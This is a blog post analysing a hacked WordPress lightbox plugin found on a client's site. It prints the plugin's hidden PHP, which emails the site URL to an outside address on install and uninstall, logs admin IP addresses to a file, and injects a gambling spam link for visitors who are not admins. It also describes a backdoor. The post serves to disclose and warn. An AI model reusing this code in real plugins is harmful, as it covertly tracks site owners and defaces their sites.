Dead Eye Creative
Select Page

WP Handy Lightbox WordPress Plugin Vulnerability and/or Hack

I found a hacked wordpress plugin on one of my clients websites and thought I would post about it to show everyone what I found. The WP Handy Lightbox WordPress Plugin was emailing the developer: hansenmartinwew@gmail.com and telling if it was installed or uninstalled. It would log the IP of the admins. When you went to the site, it would check to see if you where an admin with your ip, then if you where not it would add a spam link on all pages. Inserting code into the situation really could have been a lot more destructive. Cool little script really. It could do so much more.

This code emails the developer with the location of the install:

/*

function actithelightbox_activate() {

$yourip = $_SERVER[‘REMOTE_ADDR’];
$fp = fopen($_SERVER[‘DOCUMENT_ROOT’] . ‘/wp-content/plugins/wp-handy-lightbox/welcome.txt’, ‘w’);
fwrite($fp, $yourip);
fclose($fp);
add_option(‘redirectlightbox_do_activation_redirect’, true);
session_start(); $subj = get_option(‘siteurl’); $msg = “Plugin Activated”; $from = get_option(‘admin_email’); mail(“xxx@gmail.com”, $subj, $msg, $from);
wp_redirect(‘../wp-admin/options-general.php?page=jquery-lightbox-options’);
}

/** Uninstall The Plugin */
function deactthelightbox_deactivate() {
session_start(); $subj = get_option(‘siteurl’); $msg = “Plugin Uninstalled”; $from = get_option(‘admin_email’); mail(“xxx@gmail.com”, $subj, $msg, $from);
}

*/

This code checks to see if you are admin – if not it does something.

In this case it was inserting a link for a slot machine gambling site.

/*

/** Install Settings Locally */
function outputseo() {
if (is_user_logged_in()) {
$ip = $_SERVER[‘REMOTE_ADDR’];
$filename = $_SERVER[‘DOCUMENT_ROOT’] . ‘/wp-content/plugins/wp-handy-lightbox/welcome.txt’;
$handle = fopen($filename, “r”);
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER[‘DOCUMENT_ROOT’] . ‘/wp-content/plugins/wp-handy-lightbox/welcome.txt’, ‘w’);
fwrite($fp, $contents);
fclose($fp);
}

*/

Code shown here checks if you are admin – if not it serves a spam SEO link on the site.

/*

$ip = $_SERVER[‘REMOTE_ADDR’];
$filename = $_SERVER[‘DOCUMENT_ROOT’] . ‘/wp-content/plugins/wp-handy-lightbox/welcome.txt’;
$handle = fopen($filename, “r”);
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
?>
<a href=”http://www.slotmachines.us.org”>Casino Games</a>
<?php //
} else { echo ”;}
?>

*/

Here are screenshots of the code with explanations.

Creates spam link if not admin

This is what the link looked like – upper left hand corner

Copies all of the admin IP addresses

emails on uninstall

Here is the vulnerability. It allows writing to a file install.php – this is where the link was being added – you could do more with it

emails the developer upon installation

showing specifically the link in was inserting on the site in question

WordPress Vulnerability

This is a backdoor. An easy way for someone from outside to insert code onto your server. You could do a lot of damage with this.

showing the emails it was sending on install and uninstall

this was the search where I found part of the code in the first place on the clients server.




Pin It on Pinterest

Share This